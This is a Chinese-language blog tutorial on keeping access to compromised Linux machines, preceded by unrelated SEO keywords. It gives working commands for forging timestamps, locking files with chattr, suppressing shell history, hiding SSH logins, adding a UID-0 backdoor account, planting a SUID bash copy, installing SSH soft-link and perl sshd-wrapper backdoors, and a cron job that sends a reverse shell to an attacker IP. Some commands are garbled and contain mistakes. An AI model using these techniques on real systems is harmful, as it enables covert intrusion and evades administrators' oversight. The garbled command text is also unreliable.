免费做网站优化,网站提交入口汇总,江苏省住房和城乡建设厅假网站,软件界面设计的基本原则作者名#xff1a;白昼安全主页面链接#xff1a; 主页传送门创作初心#xff1a; 以后赚大钱座右铭#xff1a; 不要让时代的悲哀成为你的悲哀专研方向#xff1a; web安全#xff0c;后渗透技术每日鸡汤#xff1a; 钱至少对于现在的我来说#xff0c;的确是万能的在…作者名白昼安全主页面链接 主页传送门创作初心 以后赚大钱座右铭 不要让时代的悲哀成为你的悲哀专研方向 web安全后渗透技术每日鸡汤 钱至少对于现在的我来说的确是万能的在红队行动中在网络中获得最初的立足点是一项耗时的任务。因此持久性是红队成功运作的关键这将使团队能够专注于目标而不会失去与指挥和控制服务器的通信。所以这就引出了我们今天要讲解的内容——权限维持当然权限维持我们也是分为windows和linux来讲上篇文章我们讲到了windows的权限维持姿势这篇文章就讲解的是Linux的权限维持姿势这里的姿势也只是讲一些常见的用的比较多的姿势来讲希望博客的内容能够帮助到大家一、木马隐藏权限维持简单来说就是怕我们好不容易拿到的权限因为用户的排查或者一些原因导致丢失而如果我们能够将木马藏得够深够隐蔽让用户无法排除出来这样就能让我们的木马一直在目标的电脑上自然也就实现了权限维持下面就来介绍几种隐藏木马的姿势1、时间伪造查看文件创建时间就是很多的安全人员排查异常文件的方式也是通过ls -la命令就可以查看可以看到这里显示time.txt文件是2月22日10:12创建的这个也称为时间戳而管理员一旦看到这么新的文件肯定会重点排查一下这就让我们的木马暴露了所以很多管理员会通过时间戳查看文件创建的时间如果是最近创建的那么就会去重点排查而我们可以通过下面的命令修改木马的时间戳touch -r 目标时间戳的文件 要修改时间戳的文件 这样就可以把其他文件的时间戳复制到我们想要修改时间戳的文件例如可以看到这样就实现了对我们木马文件的时间戳的伪造管理员就无法通过时间戳来查找我们的恶意文件2、隐藏文件Linux中以.点号开头的就是隐藏文件而隐藏文件单纯使用ls是无法查看的需要使用ls -la才能查看到如下可以看到我在该目录创建了一个.hiden.txt文件再使用ls并没有找到该文件而使用ls -la命令就成功找到了刚才创建的.hiden.txt而如果目标的管理员没有使用ls -la查看文件的一个习惯的话就很可能找不到这个文件3、chattr命令Linux chattr命令用于改变文件属性。这项指令可改变存放在ext2文件系统上的文件或目录属性这些属性共有以下8种模式a让文件或目录仅供附加用途。b不更新文件或目录的最后存取时间。c将文件或目录压缩后存放。d将文件或目录排除在倾倒操作之外。i不得任意更动文件或目录。s保密性删除文件或目录。S即时更新文件或目录。u预防意外删除。这个操作就比较牛马主要是用他的“i”选项效果如下可以看到当我们使用chattr命令的-i选项对目标文件锁定后就算root权限强制删除都无法删除这个文件一些不懂的管理员甚至会以为这是系统自带的重要系统配置文件从而不去动解决锁定的方法chattr -i 目标文件名4、历史记录隐藏history命令就是显示命令历史记录的指令如下这样就可以发现一些攻击者在机器上执行的一些恶意命令而就有可能发现我们创建的木马所以我们就要想办法删除这个历史记录或者隐藏我们的输入指令如下 set o history输入这个指令之后后续输入的命令就不会被记录到history的回显结果中也就是攻入目标系统之后先输入这条指令再输入恶意攻击指令我们的恶意攻击命令就不会被记录5、SSH登录记录在Linux中可以使用Last查看账号SSH登录情况last|grep root当我们用ssh进行登录时就会记录信息包括登录的账号远程登录的主机登录时间ssh加上-T参数可以进行隐藏登录记录不被w、who、last等指令检测到ssh -T -i id_rsa root192.168.110.131 /bin/bash -i二、添加用户这个就是在目标机器留下一个高权限的用户账密我们都知道自然下次进来时就可以拿到权限了1、正常生成步骤如下1、创建一个名为test密码为123456的root权限用户useradd -p openssl passwd -1 -salt salt 123456 test -o -u 0 -g root -G root -s /bin/bash -d /home/test2、创建之后直接使用root权限登录就可以了2、改写文件步骤如下生成加密后的密码如下就是生成加密后的123456perl -le print crypt(123456,addedsalt)将加密结果写入passwd文件这里就是test用户密码为123456echo test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash /etc/passwd三、suid shellsuid shell 主要是方便提权配合普通用户使用使用之后就会让普通用户毫无压力提权自然也达到了类似权限维持的效果原理如下首先Linux系统上都会有一个叫Bash的shell文件这个时候我们可以把这个shell文件copy一份到另外一个文件夹再把另外一个文件夹加上us即suid的一个权限这样其他用户在登录时利用suid就可以轻松提权步骤如下将文件复制出来cp /bin/bash /tmp/shell赋予suid权限 chmod us /tmp//shell这样就设置成功了我们再使用普通用户登录执行刚才的文件 /tmp/shell -p成功拿到权限·效果如下四、公钥免密登录这个操作方式也比较简单而且我之前写了一篇博客来介绍这种方法博客链接如下http://t.csdn.cn/ckgnp这里就不多讲了有兴趣的同学们去看看博客就行了五、SSH软连接00 利用前提ssh配置中开启了PAM进行身份验证查看是否使用PAM进行身份验证cat /etc/ssh/sshd_config|grep UsePAM为Yes即可使用注意如果你为root用户的话你也可以手动将它开启01总的利用步骤ln -sf /usr/sbin/sshd /tmp/su ;/tmp/su -oPort9999
#开启软链接链接端口为9999firewall-cmd --add-port9999/tcp --permanent
#开启防火墙规则不然会连接不上firewall-cmd --reload
#重启防火墙服务firewall-cmd --query-port9999/tcp
#查看防火墙9999端口是否被放行回显为YES即成功放行ssh root192.168.149.133 -p 9999
#使用软链接登录密码可以随便输入
192.168.149.133为我环境中目标的ip六、ssh wrapper原理首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候正则匹配会失败于是执行下一句启动/usr/bin/sshd这是原始sshd。原始的sshd监听端口建立了tcp连接后会fork一个子进程处理具体工作。这个子进程没有什么检验而是直接执行系统默认的位置的/usr/sbin/sshd这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字getpeername能真的获取到客户端的TCP源端口如果是19526就执行sh给个shell简单点就是从sshd fork出一个子进程输入输出重定向到套接字并对连过来的客户端端口进行了判断。这个原理比较绕我们也不需要深入的理解只需要会利用就可以了下面讲讲利用步骤服务端被攻击端执行如下命令cd /usr/sbin/
#进入sshd文件所在目录mv sshd ../bin/
#将正常sshd文件移出echo #!/usr/bin/perl sshd
echo exec /bin/sh if(getpeername(STDIN) ~ /^..4A/); sshd
echo exec{/usr/bin/sshd} /usr/sbin/sshd,ARGV, sshd
#将脚本写入新的sshd文件chmod ux sshd
#赋予文件执行权限/etc/init.d/sshd restart
重启ssh服务客户端执行如下命令socat STDIO TCP4:目标ip:22,sourceport13377效果如下成功连接上目标七、计划任务又是这种熟悉的方式相信大家都会了吧在前面的windows提权Linux提权Windows权限维持中都讲到了这种方式包括最开始使用redis创建计划任务反弹shell所以这里我们就简单介绍一下利用方式就行了1、创建一个sh脚本例如在/etc下创建了一个shell.sh的脚本内容如下#!/bin/bashbash -i /dev/tcp/192.168.15.130/6666 01注意这里的192.168.15.130为我们kali的攻击机的ip端口为我们攻击机接收的端口相当于控制目标主动来连我们2、赋予执行权限chmod sx /etc/shell.sh3、写入计划任务vi /etc/crontab
打开计划任务文件 将下面的指令添加到该文件中意思就是每分钟执行一次我们的恶意文件*/1 * * * * root /etc/shell.php4、重启计划任务service crond restart5、客户端开启监听这时候在我们的kali攻击器开启监听就可以成功获取到目标反弹回来的权限
